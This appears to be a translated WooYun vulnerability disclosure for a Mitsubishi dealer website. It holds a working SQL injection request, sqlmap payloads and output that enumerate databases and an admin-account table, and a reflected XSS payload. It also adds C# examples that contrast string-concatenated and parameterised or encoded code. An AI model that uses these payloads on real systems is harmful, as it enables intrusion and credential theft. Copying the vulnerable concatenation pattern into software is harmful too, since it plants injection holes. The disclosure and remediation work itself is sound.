WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-09-23: Details have been sent to the vendor and are awaiting vendor handling
2015-09-25: CNCERT (the National Internet Emergency Center) has not yet been able to contact the responsible organization; details are disclosed only to the reporting agency
2015-10-05: Details disclosed to core white hats and experts in the relevant field
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public
SQL+XSS
1. SQL injection
2. XSS (cross-site scripting)

1. SQL injection
1.1 Injection point
GET /Ajax/CommonHandler.ashx?method=DealerInfo&CityCode=4401&Where=%27+OR+%27ns%27%3d%27ns HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://**.**.**.**/BuyTools/BuyChooses/DealerSearch?tow=
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: **.**.**.**
Cookie: ASP.NET_SessionId=tkfjxlpktswxl3cbbnhjqln3; SC_ANALYTICS_GLOBAL_COOKIE=f4b1236f12cd4844a44d5be7e0a051d7; SC_ANALYTICS_SESSION_COOKIE=E7D9D5BAF68E4D18A25EC94839FA5F00|0|tkfjxlpktswxl3cbbnhjqln3; MITSUBISHI_COOKIE={"Car":"{\"1100000501\":6}"}; \"1100000323\":1}"}=; NewsId=dbc2158a-090c-490f-9b66-346d574e3947|fa7168aa-60b3-4b10-8ea7-c49b186ee3cb|226c662d-6db8-469e-b7ce-f1eee1d6f26a|f351b356-d753-46a3-8d2e-f179fde37491|c3dcd749-e362-4add-beee-650047eaf8ee|5fe1f30c-c954-428d-9d2b-32f5e740267a|73c06fb6-2a84-4562-8341-35c5b2368cc8|2f97806f-5b19-4f98-bf38-0bfece5d539d|cf816137-b05c-4ed1-b28a-02b0dbd2587f|08c6716e-93e5-486e-868b-c598a08634e1|da49e78f-5fc9-4eb3-beaa-b452dc89cda7|67ca10f9-9e2d-48cf-a52f-5faf7aa6d80b|283a20e9-89dd-485c-b40d-eb177ca1700f; website#sc_mode=edit; shell#sc_mode=edit
Accept-Encoding: gzip, deflate
1.2 Databases involved
Place: GET
Parameter: Where
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Where=3%' AND 5562=5562 AND '%'='

Place: GET
Parameter: CityCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' AND 9587=9587 AND 'kCYY'='kCYY&Where=3
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: Where, type: Single quoted string (default)
[1] place: GET, parameter: CityCode, type: Single quoted string
[q] Quit
> 1
available databases [10]:
[*] GMMC_Extend
[*] master
[*] Mitsubishi_master
[*] Mitsubishi_WeChat
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] temp
[*] tempdb
1.3 Tables and columns
Database: Mitsubishi_WeChat
[13 tables]
+------------------------+
| dbo.Account            |
| dbo.AdminAccount       |
| dbo.Articles           |
| dbo.AvailableFunctions |
| dbo.Exception          |
| dbo.Member             |
| dbo.Menus              |
| dbo.Scenes             |
| dbo.UrlInfo            |
| dbo.UserPhones         |
| dbo.[KeyWor s]         |
| dbo.hn                 |
| dbo.urlzm              |
+------------------------+

======================

Database: Mitsubishi_WeChat
Table: dbo.AdminAccount
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| Account   | nvarchar |
| Id        | int      |
| JoinTime  | datetime |
| LastLogin | datetime |
| PassWord  | nvarchar |
+-----------+----------+
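Both injectable parameters (Where and CityCode) behave as values inside single-quoted SQL strings, which is the signature of request input being concatenated into the statement text. The following C# is an added example, not the site's own CommonHandler.ashx code: it models that concatenation pattern for contrast and then shows the hardened form, where the SQL text is fixed and every request value is passed as a typed SqlParameter. The Dealers table and its Name and Address columns are assumed for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example; not the application's code. Table and column names are assumed.
public static class DealerQueries
{
    // The pattern behind the report: request values are pasted into the SQL text,
    // so a value such as  ' OR 'ns'='ns  rewrites the statement. Contrast only.
    public static string VulnerableSql(string cityCode, string where)
    {
        return "SELECT Name, Address FROM Dealers WHERE CityCode = '" + cityCode + "'"
             + " AND Name LIKE '%" + where + "%'";
    }

    // Hardened form: the statement is constant, values travel as parameters, and
    // CityCode is validated against the shape the application expects (4 digits).
    public static SqlCommand HardenedCommand(SqlConnection conn, string cityCode, string nameFilter)
    {
        if (cityCode == null || cityCode.Length != 4 || !int.TryParse(cityCode, out _))
            throw new ArgumentException("CityCode must be a four-digit code", nameof(cityCode));

        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandType = CommandType.Text;
        cmd.CommandText =
            "SELECT Name, Address FROM Dealers WHERE CityCode = @CityCode AND Name LIKE @Pattern";
        cmd.Parameters.Add("@CityCode", SqlDbType.Char, 4).Value = cityCode;

        // A parameter stops the value from changing the statement, but % and _ would
        // still act as LIKE wildcards, so escape them before adding the wrapper %.
        string escaped = EscapeLike(nameFilter ?? string.Empty);
        cmd.Parameters.Add("@Pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
        return cmd;
    }

    // SQL Server LIKE escaping: wrap each special character in brackets.
    // "[" must be handled first so the brackets added for % and _ are not re-escaped.
    public static string EscapeLike(string value)
    {
        return value.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }
}
```

The handler's ProcessRequest would read the query string, call HardenedCommand with an open connection, and serialize the reader's rows to JSON; a free-form "Where" parameter has no place in that design, since there is no way to parameterize an arbitrary WHERE clause. Because sqlmap also confirmed CityCode as injectable, it is typed and length-checked here rather than trusted as a number.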
2. XSS
http://**.**.**.**/SearchResult?keywords=<IMG src="/JaVaScRiPt.:alert"("XSS")>
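The keywords parameter of SearchResult is reflected into the page without encoding, which is why a tag supplied in the URL lands in the markup. The C# below is an added example, not the site's code: it models a view that reflects keywords into an element body and into an input attribute, first as the raw concatenation the report implies and then with context-appropriate HTML encoding via System.Net.WebUtility. The markup and method names are assumed.

```csharp
using System;
using System.Net;

// Added example; not the application's code. Markup is illustrative.
public static class SearchResultView
{
    // The pattern behind the report: the raw parameter becomes part of the HTML,
    // so any tag or attribute breakout in it is parsed by the browser. Contrast only.
    public static string RenderRaw(string keywords)
    {
        return "<h2>Results for: " + keywords + "</h2>"
             + "<input type=\"text\" name=\"keywords\" value=\"" + keywords + "\">";
    }

    // Hardened form: encode at the point of output for the context the value lands in.
    // HtmlEncode turns < > & " (and ') into entities, which is correct for both an
    // element body and a double-quoted attribute value.
    public static string RenderEncoded(string keywords)
    {
        string safe = WebUtility.HtmlEncode(keywords ?? string.Empty);
        return "<h2>Results for: " + safe + "</h2>"
             + "<input type=\"text\" name=\"keywords\" value=\"" + safe + "\">";
    }

    // Quick self-check usable from a unit test: the encoded output must never contain
    // a raw angle bracket or double quote that originated in the input.
    public static bool ContainsNoRawMarkup(string keywords)
    {
        string html = RenderEncoded(keywords);
        string prefixStripped = html.Replace("<h2>", "").Replace("</h2>", "")
                                    .Replace("<input type=\"text\" name=\"keywords\" value=\"", "")
                                    .Replace("\">", "");
        return prefixStripped.IndexOf('<') < 0 && prefixStripped.IndexOf('"') < 0;
    }
}
```

Encoding on output is the robust fix; stripping "special characters" on input, as the remediation below suggests, is a weaker control because the same value may later be emitted into a JavaScript string, a URL or an attribute where a different character set matters. A Content-Security-Policy header that disallows inline script is a useful second layer but does not replace encoding.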
1. SQL injection

1. Filter the parameters
2. Again, filtering (of special characters)
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-25 17:14
No direct handling channel with the site's administering organization has been established yet; awaiting claim.
None